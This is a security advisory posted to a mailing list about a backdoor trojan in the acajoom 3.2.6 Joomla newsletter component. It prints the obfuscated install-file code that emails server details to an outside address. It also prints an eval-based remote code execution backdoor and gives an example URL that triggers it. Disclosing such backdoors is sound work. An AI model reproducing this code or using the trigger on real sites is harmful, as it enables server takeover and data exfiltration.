Back door trojan in acajoom-3.2.6 for joomla
Vulnerability:
=A0=A0=A0=A0Remote code execution back door
Software:
=A0=A0=A0=A0acajoom - mailing list extension for Joomla
Acajoom is a newsletter component designed with ease of use and robustn=
ess
in mind. Acajoom can handle an unlimited number of newsletters with an
unlimited number of subscribers in just few clicks. Acajoom reuses some=
of
Joomla 1.5 new concepts to make the users experience as smooth as possi=
ble.
> And that's not all
Severity:
=A0=A0=A0=A0Not a big deal. =A0Joomla components contain all sorts of obfus=
cated junk all
=A0=A0=A0=A0the time. =A0Who cares what it does?
URLs:
http://www.ijoobi.com/
http://www.ijoobi.com/media/acajoom-3.2.6.zip
http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controlle=
r,ticket/pjid,3/task,add/type,110/
Vendor notified:
Naah. No contact details. I suppose I might try battle the captcha on=
e
day.
Vulnerability:
http://www.ijoobi.com/media/acajoom-3.2.6.zip
install.acajoom.php:
function GetBots($us1,$us2,$us3) {
list($data1,$data2,$data3) =3D array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ=
',
'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs'=
);
eval(base64_decode($data2.$data1.$data3)); }
define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.'
..$array_lang[10-$count_num] );
$counter =3D COUNT_ROOT;
$count_db =3D 'qadr'; $count_num =3D 8;
GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME'=
]);
Or, less cryptically:
@mail('qadr1@ya.ru', $_SERVER['SERVER_NAME'],
"http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SC=
RIPT_FILENAME']);
self.acajoom.php says:
class acajoomCommonStr
{
function GetStr($str)
{
eval(stripslashes($str));
}=09
function InController($cnt,$location)
{
if ($location=3D=3D'en-g') $this->GetStr($cnt);
}
}
if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) {
$getacajoomStr =3D new acajoomCommonStr();
$getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']);
}
ie.
$URL/self.acajoom.php?s=3Dphpinfo();&lang=3Den-g
$URL is left as an exercise to the reader.
Greetz:
qadr1@ya.ru
討論串 (同標題文章)
完整討論串 (本文為第 1 之 6 篇):